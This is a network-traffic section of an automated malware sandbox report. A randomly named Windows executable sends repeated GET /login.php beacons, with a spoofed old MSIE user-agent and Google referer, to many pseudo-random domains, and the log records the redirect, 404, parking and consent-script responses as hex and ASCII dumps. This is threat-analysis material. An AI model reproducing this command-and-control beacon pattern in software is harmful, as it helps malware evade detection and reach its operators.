                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.6 | 52126 | 188.114.96.3 | 80 | 6912 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:02.691417933 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyhig.com
Nov 11, 2024 18:51:03.387069941 CET | 966 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:03 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: https://qegyhig.com/login.php
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3S6N%2FdXbrZYQHEs6X9pvchDPPcRSfj28bga8Xjo0OpfFATynLUC7cLpPRPuLRTA7xNHCoWOiKF%2BhEmsLhGZxaLdONiM9STO0gMfYDhBRiH93jXagf2Kgwqymu409FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e1020cc18f24390-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1274&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                  Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.6 | 52128 | 188.114.96.3 | 80 | 1220 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:02.787517071 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyhig.com
Nov 11, 2024 18:51:03.512835979 CET | 970 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:03 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: https://qegyhig.com/login.php
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m%2FNLXFZo7gMuEyQOH88caaMUP80aHjmpaw9%2B8jESWaOr8endqcT8id0qmPdlUhUEHIX4zjTTfndFdCDbM6%2F0i%2FdFUtJ3VuNq3M1PezeSSIssrYXsXBGN7UnWGmF7GA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e1020cceeac5122-MSP
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=33449&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:51:10.637952089 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyhig.com
Nov 11, 2024 18:51:11.007024050 CET | 982 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:10 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: https://qegyhig.com/login.php
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hyQKLiEgjNYtDIcdjIP%2FGvr8svV8jt%2FzSE36tHyi5s3aTbSlsBWkdw%2FtKW5fUeBjI00%2Fq4TQA99Mv6gf9%2BiKS0u5%2FpOnrTOiaV1r1ZZ8MVFbeS3TA%2Bl6l41NLREm3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e1020fbdd645122-MSP
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=33421&sent=4&recv=6&lost=0&retrans=0&sent_bytes=970&recv_bytes=486&delivery_rate=86727&cwnd=32&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.6 | 52129 | 18.208.156.248 | 80 | 6912 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:02.822654963 CET | 352 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vonypom.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347428|1731347428|0|1|0
Nov 11, 2024 18:51:03.250683069 CET | 335 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:03 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347463|1731347428|17|2|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.6 | 52133 | 199.59.243.227 | 80 | 2268 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:03.045324087 CET | 305 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vojyqem.com
                                                                                                                                                                                                                  Cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
Nov 11, 2024 18:51:03.476097107 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:51:02 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                                                                                  content-length: 1094
                                                                                                                                                                                                                  x-request-id: 79a69c9a-1d87-48f9-b717-b8432c593b33
                                                                                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                                  set-cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723; expires=Mon, 11 Nov 2024 18:06:03 GMT
                                                                                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
Nov 11, 2024 18:51:03.476470947 CET | 520 | IN
                                                                                                                                                                                                                  Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWU4OTBhNzMtYWMzYi00MmQwLTgwNmYtMzk3MjVmYTRiNzIzIiwicGFnZV90aW1lIjoxNzMxMzQ3NDYzLCJwYWdlX3VybCI6Imh0dHA6L


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.6 | 52127 | 178.162.203.226 | 80 | 1220 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:04.107654095 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.6 | 52146 | 44.221.84.105 | 80 | 3472 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:04.949095964 CET | 353 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qetyfuv.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347462|1731347428|17|2|0
Nov 11, 2024 18:51:05.395109892 CET | 335 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:05 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347465|1731347428|10|3|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.6 | 52145 | 44.221.84.105 | 80 | 3472 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:04.989568949 CET | 352 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vocyzit.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347428|1731347428|0|1|0
Nov 11, 2024 18:51:05.390666008 CET | 335 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:05 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347465|1731347428|18|2|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                  66 | 192.168.2.6 | 52147 | 3.94.10.34 | 80 | 1220 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.994530916 CET | 352 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lymyxid.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347428|1731347428|0|1|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.472032070 CET | 335 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:05 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347465|1731347428|18|2|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                  67 | 192.168.2.6 | 52150 | 44.221.84.105 | 80 | 1220 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.027436018 CET | 352 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vocyzit.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347428|1731347428|0|1|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.476411104 CET | 335 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:05 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347465|1731347428|18|2|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                  68 | 192.168.2.6 | 52149 | 208.100.26.245 | 80 | 3472 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.032504082 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyvyxor.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.494735956 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:05 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.908651114 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyvyxor.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.013308048 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:07 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                  69 | 192.168.2.6 | 52163 | 178.162.203.226 | 80 | 3472 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.916671991 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gatyfus.com


                                                                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                  70 | 192.168.2.6 | 52164 | 199.191.50.83 | 80
                                                                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.916804075 CET | 281 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: galyqaz.com
                                                                                                                                                                                                                  Cookie: vsid=903vr478893028933998491
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.409945011 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:08 GMT
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                  Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                  Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Data Ascii: g(0,b.indexOf("="));if(b.indexOf(";")!=-1){var c=b.substring(b.indexOf("=")+1,b.indexOf(";"))}else{var c=b.substr(b.indexOf("=")+1,b.length)}if(h==g){f=c}var e=b.indexOf(";")+1;if(e==0){e=b.length}b=b.substring(e,b.length)}return(f)};window.cm
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410423040 CET518INData Raw: 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 5f 5f 67 70 70 2e 65 3d 5f 5f 67 70 70 2e 65 7c 7c 5b 5d 3b 69 66 28 21 28 22 6c 61 73 74 49 64 22 20 69 6e 20 5f 5f 67 70 70 29 29 7b 5f 5f 67 70 70 2e 6c 61 73 74 49 64 3d 30 7d 5f 5f 67
                                                                                                                                                                                                                  Data Ascii: addEventListener"){__gpp.e=__gpp.e||[];if(!("lastId" in __gpp)){__gpp.lastId=0}__gpp.lastId++;var c=__gpp.lastId;__gpp.e.push({id:c,callback:f});return{eventName:"listenerRegistered",listenerId:c,data:true,pingData:window.cmp_gpp_ping()}}else{
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410844088 CET1236INData Raw: 65 63 74 69 6f 6e 49 64 3a 33 2c 67 70 70 56 65 72 73 69 6f 6e 3a 31 2c 73 65 63 74 69 6f 6e 4c 69 73 74 3a 5b 5d 2c 61 70 70 6c 69 63 61 62 6c 65 53 65 63 74 69 6f 6e 73 3a 5b 30 5d 2c 67 70 70 53 74 72 69 6e 67 3a 22 22 2c 70 69 6e 67 44 61 74
                                                                                                                                                                                                                  Data Ascii: ectionId:3,gppVersion:1,sectionList:[],applicableSections:[0],gppString:"",pingData:window.cmp_gpp_ping()}}else{if(g==="hasSection"||g==="getSection"||g==="getField"){return null}else{__gpp.q.push([].slice.apply(a))}}}}}};window.cmp_msghandler
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410856009 CET1236INData Raw: 6c 6c 49 64 7d 7d 3b 64 2e 73 6f 75 72 63 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 61 3f 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29 3a 65 2c 22 2a 22 29 7d 2c 22 70 61 72 61 6d 65 74 65 72 22 20 69 6e 20 62 3f 62 2e 70 61 72 61 6d 65 74
